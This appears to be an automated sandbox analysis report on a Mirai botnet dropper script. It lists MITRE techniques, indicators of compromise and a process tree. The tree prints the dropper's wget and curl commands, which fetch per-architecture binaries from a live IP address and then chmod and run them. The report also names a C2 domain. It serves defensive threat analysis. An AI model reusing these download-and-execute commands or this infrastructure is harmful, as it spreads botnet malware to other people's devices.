mirai | 7c31b6f7e29de978c261d41059788662d9d53faf08be61330e611eedcd46d33b

Analysis

max time kernel
128s
max time network
152s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
19/12/2024, 07:12 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

feelme420.sh
Size

3KB
MD5

22e9d65b991f00de3a52071664dc52f9
SHA1

2b6dd972572c4c72ecf43bb7b66eebe776cd0360
SHA256

7c31b6f7e29de978c261d41059788662d9d53faf08be61330e611eedcd46d33b
SHA512

eefb50d98fc847673e4c38177789e26ee89ec7f027ec5ec92a842470638a84300f378cf10120afab26fe5a87de34c6616f33fc389be816b4763f0fea0eff18cb

Score

10^/10

mirai botnet credential_access defense_evasion discovery

Malware Config

Extracted

Family

mirai

chernobyl.stressing.world

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (12800) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 16 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1540	chmod
1612	chmod
1622	chmod
1482	chmod
1520	chmod
1562	chmod
1592	chmod
1632	chmod
1492	chmod
1510	chmod
1572	chmod
1582	chmod
1530	chmod
1550	chmod
1602	chmod
1642	chmod

Executes dropped EXE 16 IoCs

ioc	pid	Process
/tmp/f331m3420	1483	f331m3420
/tmp/f331m3420	1493	f331m3420
/tmp/f331m3420	1511	f331m3420
/tmp/f331m3420	1521	f331m3420
/tmp/f331m3420	1531	f331m3420
/tmp/f331m3420	1541	f331m3420
/tmp/f331m3420	1551	f331m3420
/tmp/f331m3420	1563	f331m3420
/tmp/f331m3420	1573	f331m3420
/tmp/f331m3420	1583	f331m3420
/tmp/f331m3420	1593	f331m3420
/tmp/f331m3420	1603	f331m3420
/tmp/f331m3420	1613	f331m3420
/tmp/f331m3420	1623	f331m3420
/tmp/f331m3420	1633	f331m3420
/tmp/f331m3420	1643	f331m3420

Modifies Watchdog functionality 1 TTPs 32 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/misc/watchdog	f331m3420
File opened for modification	/dev/watchdog	f331m3420

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Enumerates active TCP sockets 1 TTPs 15 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 32 IoCs

description	ioc	Process
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/bin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420
File opened for modification	/sbin/watchdog	f331m3420

Reads process memory 1 TTPs 34 IoCs

Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

credential_access

Proc Filesystem

T1003.007

description	ioc	Process
File opened for reading	/proc/473/maps	f331m3420
File opened for reading	/proc/592/maps	f331m3420
File opened for reading	/proc/666/maps	f331m3420
File opened for reading	/proc/857/maps	f331m3420
File opened for reading	/proc/440/maps	f331m3420
File opened for reading	/proc/442/maps	f331m3420
File opened for reading	/proc/458/maps	f331m3420
File opened for reading	/proc/469/maps	f331m3420
File opened for reading	/proc/523/maps	f331m3420
File opened for reading	/proc/662/maps	f331m3420
File opened for reading	/proc/428/maps	f331m3420
File opened for reading	/proc/934/maps	f331m3420
File opened for reading	/proc/590/maps	f331m3420
File opened for reading	/proc/429/maps	f331m3420
File opened for reading	/proc/448/maps	f331m3420
File opened for reading	/proc/461/maps	f331m3420
File opened for reading	/proc/462/maps	f331m3420
File opened for reading	/proc/563/maps	f331m3420
File opened for reading	/proc/691/maps	f331m3420
File opened for reading	/proc/409/maps	f331m3420
File opened for reading	/proc/513/maps	f331m3420
File opened for reading	/proc/507/maps	f331m3420
File opened for reading	/proc/544/maps	f331m3420
File opened for reading	/proc/690/maps	f331m3420
File opened for reading	/proc/993/maps	f331m3420
File opened for reading	/proc/506/maps	f331m3420
File opened for reading	/proc/470/maps	f331m3420
File opened for reading	/proc/923/maps	f331m3420
File opened for reading	/proc/451/maps	f331m3420
File opened for reading	/proc/466/maps	f331m3420
File opened for reading	/proc/699/maps	f331m3420
File opened for reading	/proc/949/maps	f331m3420
File opened for reading	/proc/998/maps	f331m3420
File opened for reading	/proc/457/maps	f331m3420

Changes its process name 16 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	a	1483	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1493	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1511	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1521	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1531	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1541	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1551	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1563	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1573	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1583	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1593	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1603	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1613	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1623	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1633	f331m3420
Changes the process name, possibly in an attempt to hide itself	a	1643	f331m3420

Reads system network configuration 1 TTPs 15 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420
File opened for reading	/proc/net/tcp	f331m3420

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1043/maps	f331m3420
File opened for reading	/proc/1049/maps	f331m3420
File opened for reading	/proc/1052/maps	f331m3420
File opened for reading	/proc/1059/maps	f331m3420

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1486	wget
1490	curl

Writes file to tmp directory 31 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/feelme420.mips	wget
File opened for modification	/tmp/feelme420.ppc	curl
File opened for modification	/tmp/feelme420.x86_64	curl
File opened for modification	/tmp/feelme420.i686	wget
File opened for modification	/tmp/f331m3420	feelme420.sh
File opened for modification	/tmp/feelme420.mips	curl
File opened for modification	/tmp/feelme420.arm5	curl
File opened for modification	/tmp/feelme420.spc	wget
File opened for modification	/tmp/feelme420.arc	wget
File opened for modification	/tmp/feelme420.i486	wget
File opened for modification	/tmp/feelme420.x86	wget
File opened for modification	/tmp/feelme420.arm6	curl
File opened for modification	/tmp/feelme420.ppc	wget
File opened for modification	/tmp/feelme420.sh4	wget
File opened for modification	/tmp/feelme420.sh4	curl
File opened for modification	/tmp/feelme420.arm7	wget
File opened for modification	/tmp/feelme420.arm7	curl
File opened for modification	/tmp/feelme420.mpsl	wget
File opened for modification	/tmp/feelme420.arm	curl
File opened for modification	/tmp/feelme420.i486	curl
File opened for modification	/tmp/feelme420.x86	curl
File opened for modification	/tmp/feelme420.arm5	wget
File opened for modification	/tmp/feelme420.m68k	wget
File opened for modification	/tmp/feelme420.m68k	curl
File opened for modification	/tmp/feelme420.spc	curl
File opened for modification	/tmp/feelme420.i586	curl
File opened for modification	/tmp/feelme420.mpsl	curl
File opened for modification	/tmp/feelme420.arm6	wget
File opened for modification	/tmp/feelme420.arc	curl
File opened for modification	/tmp/feelme420.x86_64	wget
File opened for modification	/tmp/feelme420.i686	curl

/tmp/feelme420.sh
/tmp/feelme420.sh
1⤵
- Writes file to tmp directory
PID:1468
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.x86
  2⤵
  - Writes file to tmp directory
  PID:1469
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.x86
  2⤵
  - Writes file to tmp directory
  PID:1478
- /bin/cat
  cat feelme420.x86
  2⤵
  PID:1481
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  2⤵
  - File and Directory Permissions Modification
  PID:1482
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Changes its process name
  PID:1483
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1486
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1490
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.mips feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  2⤵
  - File and Directory Permissions Modification
  PID:1492
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1493
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1504
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1508
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  2⤵
  - File and Directory Permissions Modification
  PID:1510
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1511
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.arm
  2⤵
  PID:1514
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.arm
  2⤵
  - Writes file to tmp directory
  PID:1518
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1521
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.arm5
  2⤵
  - Writes file to tmp directory
  PID:1524
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.arm5
  2⤵
  - Writes file to tmp directory
  PID:1528
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  2⤵
  - File and Directory Permissions Modification
  PID:1530
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1531
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.arm6
  2⤵
  - Writes file to tmp directory
  PID:1534
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.arm6
  2⤵
  - Writes file to tmp directory
  PID:1538
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  2⤵
  - File and Directory Permissions Modification
  PID:1540
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1541
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.arm7
  2⤵
  - Writes file to tmp directory
  PID:1544
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.arm7
  2⤵
  - Writes file to tmp directory
  PID:1548
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT
  2⤵
  - File and Directory Permissions Modification
  PID:1550
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1551
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.ppc
  2⤵
  - Writes file to tmp directory
  PID:1556
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.ppc
  2⤵
  - Writes file to tmp directory
  PID:1560
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  2⤵
  - File and Directory Permissions Modification
  PID:1562
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1563
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.m68k
  2⤵
  - Writes file to tmp directory
  PID:1566
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.m68k
  2⤵
  - Writes file to tmp directory
  PID:1570
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  2⤵
  - File and Directory Permissions Modification
  PID:1572
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1573
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.sh4
  2⤵
  - Writes file to tmp directory
  PID:1576
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.sh4
  2⤵
  - Writes file to tmp directory
  PID:1580
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  2⤵
  - File and Directory Permissions Modification
  PID:1582
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1583
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.spc
  2⤵
  - Writes file to tmp directory
  PID:1586
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.spc
  2⤵
  - Writes file to tmp directory
  PID:1590
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  2⤵
  - File and Directory Permissions Modification
  PID:1592
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1593
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.arc
  2⤵
  - Writes file to tmp directory
  PID:1596
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.arc
  2⤵
  - Writes file to tmp directory
  PID:1600
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  2⤵
  - File and Directory Permissions Modification
  PID:1602
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1603
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1606
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1610
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  2⤵
  - File and Directory Permissions Modification
  PID:1612
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1613
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.i686
  2⤵
  - Writes file to tmp directory
  PID:1616
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.i686
  2⤵
  - Writes file to tmp directory
  PID:1620
- /bin/chmod
  chmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z
  2⤵
  - File and Directory Permissions Modification
  PID:1622
- /tmp/f331m3420
  ./f331m3420 feelme420.exploit
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1623
- /usr/bin/wget
  wget http://94.23.167.188/F331M3/feelme420.i486
  2⤵
  - Writes file to tmp directory
  PID:1626
- /usr/bin/curl
  curl -O http://94.23.167.188/F331M3/feelme420.i486
  2⤵
  - Writes file to tmp directory
  PID:1630
- /bin/chmod
